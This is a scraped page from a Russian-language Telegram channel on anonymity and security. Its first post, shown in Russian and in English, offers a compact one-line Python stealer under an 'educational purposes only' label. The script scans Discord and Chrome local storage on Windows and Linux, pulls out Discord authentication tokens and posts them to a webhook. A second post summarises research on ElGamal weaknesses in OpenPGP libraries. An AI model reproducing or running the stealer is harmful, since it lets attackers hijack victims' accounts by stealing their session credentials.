0% Privacy
6.8K subscribers
1.57K photos
53 videos
542 files
703 links
канал про анонимность, ИБ и бред автора в конвульсиях шизофрении.

The channel is about anonymity, information security and the author's delirium in the convulsions of schizophrenia.
Download Telegram
|One line token stealer|

🛡Только в образовательных целях!
🦠Очень маленький стиллер токенов, который умещается в одну строку(на данный момент 842 байта) и написан на питоне.
🔓Поддерживает линух !
Собственно вот и он:
[__import__('threading').Thread(target=lambda:[[[__import__('requests').post('Webhook here!',data={'content':'\n```get stealed :: %s```\n'%x}) for x in list(set(__import__('re').findall(r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}|mfa\.[\w-]{84}', open('%s/%s'%(path,file_name), encoding='utf-8', errors="ignore").read())))] for file_name in __import__('os').listdir(path) if file_name.endswith(".log") or file_name.endswith(".ldb") or file_name.endswith(".sqlite")]]).run() for path in ['%s'%(__import__('os').path.join((__import__('os').getenv('APPDATA')) if __import__('os').name == "nt" else (__import__('os').path.expanduser("~")+"/.config/"), endpoint, "Local Storage","leveldb")) for endpoint in ["discord", "discordcanary", "discordptb", "google-chrome/Default", "Google\\Chrome\\User Data\\Default"]] if __import__('os').path.isdir(path)]

🛡For educational purposes only!
🦠A very small token stiller that fits in one line (currently 842 bytes) and is written in python.
🔓Linux support !
Actually here he is:
[__import__('threading').Thread(target=lambda:[[[__import__('requests').post('Webhook here!',data={'content':'\n```get stealed :: %s```\n'%x}) for x in list(set(__import__('re').findall(r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}|mfa\.[\w-]{84}', open('%s/%s'%(path,file_name), encoding='utf-8', errors="ignore").read())))] for file_name in __import__('os').listdir(path) if file_name.endswith(".log") or file_name.endswith(".ldb") or file_name.endswith(".sqlite")]]).run() for path in ['%s'%(__import__('os').path.join((__import__('os').getenv('APPDATA')) if __import__('os').name == "nt" else (__import__('os').path.expanduser("~")+"/.config/"), endpoint, "Local Storage","leveldb")) for endpoint in ["discord", "discordcanary", "discordptb", "google-chrome/Default", "Google\\Chrome\\User Data\\Default"]] if __import__('os').path.isdir(path)]

#stealer
👍5
0% Privacy pinned «|Time Attack| Шизо на связи Предисловие. Итак, сижу спокойно, пишу говнокод, читаю скучные работы и много рутины, как вдруг мне приходит сообщение на жабу с вопросом про "атаки по времени" и статью от человека, категорию которых уже описывал: "ананимность"…»
|(Не)безопасность Эль-Гамаля в OpenPGP|

Градус шизофрении у Шизо накаляется.
🔐Интересная работа по криптографии с конференции Real World Cryptography Conference 2022.
В ней разбирается реализация ElGamal в OpenPGP посредством либ Botan(используется в Thunderbird) и Libcrypto++(в простонародье - CryptoPP, github), а также ещё несколько реализаций от GnuPG и Go(используется в мною не любимом protonmail).

По собственному опыту шизофренического использования криптолиб, удобнее показалось взаимодействие с CryptoPP, хотя это субъективно. Для многих, кто просто использует OpenPGP для обмена информации по электронной и почте и не только и не вникали, из чего состоит этот стандарт, криптосистема Эль-Гамаля используется в качестве одной и частей системы шифрования публичных ключей в OpenPGP(можно сказать - главной).
Тут, кстати, можете почитать про предлагаемый стандарт(формат сообщений) RFC 4880.
Вообще, одна из причин порождающих атаки на криптосистему(стандарт) - отсутствие единого стандарта у Эль-Гамаля -> уйма имплементаций протокола. Хотя не безопасность использования является следствием взаимодействия сразу нескольких реализаций.

В результате исследования на основе 800 тысяч открытых ключей Эль-Гамаль, удалось восстановить только 2 тысячи ключей, хотя этой уже тревожный звоночек, честно говоря. Как и убедился со временем - лучше использовать GnuPG, ибо даже на фоне этих событий атака будет много более трудно затратной по сравнению с другими реализациями, ибо ресурсы для атаки нужны очень большие.

Собственно, а в чём же заключается атака?
Она происходит чаще всего из-за наличия разных конфигураций параметров и применений такого вектора атак, как атака по сторонним каналам(side-channels attacks),а также кросс конфигурационная атака , к примеру самыми просторными атаками будут на связку ключ/либа:GnuPG/LibcryptoPP, GnuPG/Go, а самая сильная - x ∈ [1; p-1]/GnuPG. LibcryptoPP(Botan)/LibcryptoPP и LibcryptoPP(Botan)/Go - пока проверяются.

Также стоит отметить, что использование простого числа Шнора с примитивным генератором, тоже уменьшает безопасность криптосистемы. Атака производится путём получения зашифрованных сообщений(текстов) и дальнейшим дешифрованием.
💾Подробнее можно почитать в работе и на скринах, ниже прикладываю презентацию с Real World Crypto 2022⬇️ и работу, которая вышла в 2021 году ⬇️.

обновление: инструмент для проверки уязвим ли клиент OpenPGP CVE-2021-33560

#shizo #cryptography #privacy
🔥1
|(In)security of ElGamal in OpenPGP|

The degree of schizophrenia in the Schizo is heating up.
🔐Interesting work on cryptography from the Real World Cryptography Conference 2022.
It understands the implementation of ElGamal in OpenPGP via lib Botan(used in Thunderbird) and Libcrypto++(in the common people - CryptoPP, github), as well as several other implementations from GPGME( GnuPG )and Go(used in my disliked protonmail).
From my own experience of schizophrenic use of cryptolib, it seemed more convenient to interact with CryptoPP, although this is subjective. For many who simply use OpenPGP to exchange information by e-mail and not only and did not delve into what this standard consists of, the El-Gamal cryptosystem is used as one and parts of the public key encryption system in OpenPGP (we can say the main one).
Here, by the way, you can read about the proposed standard (message format) RFC 4880.
In general, one of the reasons generating attacks on the cryptosystem (standard) is the lack of a single standard for El Gamal -> a lot of protocol implementations. Although not the safety of use is a consequence of the interaction of several implementations at once.
As a result of a study based on 800 thousand public keys of El Gamal, it was possible to recover only 2 thousand keys, although this is already a wake-up call, to be honest. As I became convinced over time, it is better to use GnuPG, because even against the background of these events, the attack will be much more difficult to spend compared to other implementations, because the resources needed for the attack are very large.
Actually, what is the attack?
It occurs most often due to the presence of different configurations of parameters and applications of such an attack vector as an attack on third-party channels (side-channels attacks), as well as a cross-configuration attack, for example, the most spacious attacks will be on the key/lib bundle:GnuPG/LibcryptoPP, GnuPG/Go, and the strongest is x ∈ [1; p-1]/GnuPG. LibcryptoPP(Botan)/LibcryptoPP and LibcryptoPP(Botan)/Go are still being checked.
It is also worth noting that using a Schnor prime number with a primitive generator also reduces the security of the cryptosystem. The attack is carried out by receiving encrypted messages (texts) and further decryption.
💾You can read more in the work and on the screenshots, below I attach a presentation with Real World Crypto 2022 ⬇️ and the work that was released in 2021⬇️.

update: a tool to check whether the OpenPGP client is vulnerable CVE-2021-33560

#shizo #cryptography #privacy
👍1